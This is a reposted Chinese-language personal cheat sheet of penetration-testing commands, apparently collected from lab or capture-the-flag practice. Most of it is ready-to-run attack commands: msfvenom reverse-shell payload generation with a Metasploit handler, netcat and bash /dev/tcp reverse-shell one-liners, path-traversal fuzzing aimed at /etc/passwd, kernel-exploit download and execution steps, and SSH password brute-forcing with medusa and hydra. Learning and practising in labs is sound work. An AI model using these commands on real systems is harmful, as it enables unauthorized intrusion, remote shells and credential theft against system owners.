渗透工具及其知识库(个人笔记)

这篇具有很好参考价值的文章主要介绍了渗透工具及其知识库(个人笔记)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.IP搜寻

查看kali网段:      ip addrifconfig

namp:nmap -sP xxx.xxx.xxx.0/24

netdiscover:netdiscover  xxx.xxx.xxx.0/24

arp:arp-scan -l

2.端口扫描

粗略扫描:nmap <IP>

深度扫描:

nmap -A -p- <IP>

nmap -T4 -A -v <IP>

3.指纹探测

whatweb <url>

cmseek -u <url>

4.目录扫描

gobuster

gobuster dir -u <url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt -b '403,404'

dirb

dirb <url>

dirb <url> -x .php,.zip,.txt,.html  等

5.参数探测

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 http://192.168.232.128/index.php?FUZZ=index.php

wfuzz -c -u http://192.168.110.131/manage.php?FUZZ=../../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt -H "Cookie:PHPSESSID=l5r7estpbj5rrcfapfdhun8v6p"

6.msf木马文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.232.152 LPORT=7777  -o mshell.php

修改上述的php,生成不同的文件马

生成java jsp木马:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > breach.war

木马使用

use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.110.129
set lport 4444
run

linux

/etc/passwd:存放相关用户信息

/etc/knock.conf:ssh保护机制knock的配置文件

/etc/*-release:查看操作系统

sudo -l

查看可以以root权限执行的文件和命令

查看内核

uname -auname -rmshostnamectl

find

find / -name "xxx" 2>/dev/null

su

su user

ls -a

查看所有文件及其相关权限

ssh

ssh user@ip

md5加密

md5加密
echo -n "ippsec" | md5sum
转为十六进制
echo -n "366a74cb3c959de17d61db30591c39d1" | od -An -t x1 |tr -d ' ' |tr -d '\n'
 
| od -An -t x1:管道 (|) 将 echo 输出的内容传递给 od(octal dump)命令。-An 参数表示不打印地址,-t x1 表示以十六进制形式输出每个字节。
| tr -d ' ':tr(translate)命令用于删除指定字符,这里的 -d ' ' 表示删除所有空格。
| tr -d '\n':再次使用 tr 命令删除所有的换行符(\n)。

openssl解密/加密

echo '{要解密的字符串}' | openssl enc -d -a -{解密算法} -K {key值}

key:密钥的十六进制转码

/etc/passwd的用户密码(admin)编译

 openssl passwd -1 -salt admin admin
-1 #使用md5加密算法
-salt #自动锚入一个随机参数作为文件内容加密

kali批量处理指令

 for i in $(cat CryptType);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$i -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null; echo $i;done

python交互性shell

python -c 'import pty;pty.spawn("/bin/bash")'

 反弹shell

nc -e /bin/bash 192.168.110.129 5555

bash -i >& /dev/tcp/192.168.232.128/1234 0>&1 

 exp查询

内核提权:searchsploit privilege | grep CentOS     (管理系统)

searchexploit   xxx

search xxx

内核提权.1

拿到了xxx.c

gcc编译并另存:gcc xxx.c -o yf

(未'shell'之前)msf upload:upload ~/yf ./yf

赋权:chmod +x yf

执行:./yf

 内核提权.2

找到xxx.c

放在网站目录:cp xxx.c /var/www/html

kali开启apache服务:service apache2 start

wget下载:wget http:<kali ip>/xxx.c

 赋权:chmod 777 xxx.c

 gcc编译:gcc xxx.c -o xxx

执行:./xxx

./keystore结合pcap(.p12)文件

keytool -importkeystore -srckeystore <keystore的文件名> -destkeystore 文件名.p12 -deststoretype pkcs12 -srcalias tomcat

string

strings bill.png

knock敲门

knock 192.168.110.131 7469 8475 9842

端口监听

nc -lvp 5555

ssh密码爆破

medusa

medusa -M ssh -h 192.168.0.131 -u flag4 -P /usr/share/john/password.lst -e ns -F

hydra

echo 'flag4'>admin.txt
hydra -L admin.txt -P /usr/share/john/password.lst 192.168.0.131 ssh
文章来源地址https://www.toymoban.com/news/detail-852641.html

到了这里,关于渗透工具及其知识库(个人笔记)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • LangChain + ChatGLM2-6B 搭建个人专属知识库

    之前教过大家利用 langchain + ChatGLM-6B 实现个人专属知识库,非常简单易上手。最近,智谱 AI 研发团队又推出了 ChatGLM 系列的新模型 ChatGLM2-6B,是开源中英双语对话模型 ChatGLM-6B 的第二代版本,性能更强悍。 树先生之所以现在才更新 ChatGLM2-6B 知识库教程,是想等模型本身再多

    2024年02月16日
    浏览(55)
  • 只需三步,本地打造自己的AI个人专属知识库

    本文会手把手教你如何部署本地大模型以及搭建个人知识库,使用到的工具和软件有 Ollama Open WebUI Docker AnythingLLM 本文主要分享三点 如何用Ollama在本地运行大模型 使用现代Web UI和本地大模型\\\"聊天\\\" 如何打造完全本地化的知识库:Local RAG 读完本文,你会学习到 如何使用最好用

    2024年04月27日
    浏览(40)
  • 使用OpenAI Assistants三分钟搭建个人知识库AI助手网站

    随着OpenAI将Assistants助手API对外发布,我们搭建个人知识库变的如此简单。开发者将自己的应用通过Assistants API与OpenAI对接,就可以让每一位客户拥有不一般体验的个人知识库。由于Assistants相关API有30+,本文只列举完成一个最小功能闭环涉及的接口。关于Assistants的介绍,这里

    2024年02月05日
    浏览(50)
  • AIGC内容分享(三):AIGC应用:基于RAG构建个人知识库

    目录 前言 Collect (收集) 收集是什么? Organize (组织) 组织信息 Distill (提炼) 提炼信息 Express (表达) 表达见解 Finetune调优 调整输出内容 总结一下 在信息爆炸的时代,如何有效地处理和汲取大量的信息成为一个关键的挑战,尤其对于知识工作者。如果有一个知识库就像外挂大脑

    2024年02月02日
    浏览(44)
  • docsify快速部署搭建个人知识库(支持本地、服务器、虚拟机运行)

    🏠 服务器与网站部署知识体系目录 我们先在本地运行体会与获取 docsify 结构,后面再部署到服务器上运行。 部署一个个人知识库只需要按照本文的指令直接 cv 即可。但请注意打开服务器防火墙的 80 端口。 Docsify即时生成您的文档网站。与 GitBook 不同,它不会生成静态 htm

    2024年02月04日
    浏览(48)
  • Fastgpt配合chatglm+m3e或ollama+m3e搭建个人知识库

    人工智能大语言模型是近年来人工智能领域的一项重要技术,它的出现标志着自然语言处理领域的重大突破。这些模型利用深度学习和大规模数据训练,能够理解和生成人类语言,为各种应用场景提供了强大的文本处理能力。AI大语言模型的技术原理主要基于深度学习和自然

    2024年04月16日
    浏览(45)
  • 【大模型应用开发教程】04_大模型开发整体流程 & 基于个人知识库的问答助手 项目流程架构解析

    项目仓库地址 项目学习地址 定义 将 开发以LLM为功能核心 ,通过LLM的强大理解能力和生成能力,结合特殊的数据或业务逻辑来提供独特功能的应用。 核心点 通过调用 API 或开源模型来实现核心的理解与生成 通过 Prompt Enginnering 来实现大语言模型的控制 在大模型开发中,我们

    2024年02月05日
    浏览(53)
  • 如何用 AI 工具建立自己的知识库?

    选择AI工具 :选择一个适合的AI工具,这取决于你的需求和偏好。一些流行的AI工具包括百度大脑(Baidu Brain)、微软的Azure认知服务、IBM的Watson等。 数据收集 :收集需要加入知识库的数据。这可以包括文本、图像、音频和视频等多种形式的数据。确保你有权使用这些数据,并

    2024年04月25日
    浏览(41)
  • Wiki知识库项目-全流程笔记

    2.2.1修改springboot的版本号为           2.4.0 2.2.3将代码交给git进行管理 2-5修改日志样式 2.5.1将springboot项目打印日志样式进行修改。创建logback-spring.xml文件夹,文件与application.xml文件位置并列。 2.5.2修改启动项 错误请求 请求码,405-请求方法不对,get、post方式不对  将启动类

    2024年02月14日
    浏览(39)
  • 【elasticsearch实战】知识库文件系统检索工具FSCrawler

    最近有一个需求需要建设一个知识库文档检索系统,这些知识库物料附件的文档居多,有较多文档格式如:PDF, Open Office, MS Office等,需要将这些格式的文件转化成文本格式,写入elasticsearch 的全文检索索引,方便搜索。 我这里介绍一种工具不考虑文件原来格式,但能方便将转

    2024年02月22日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包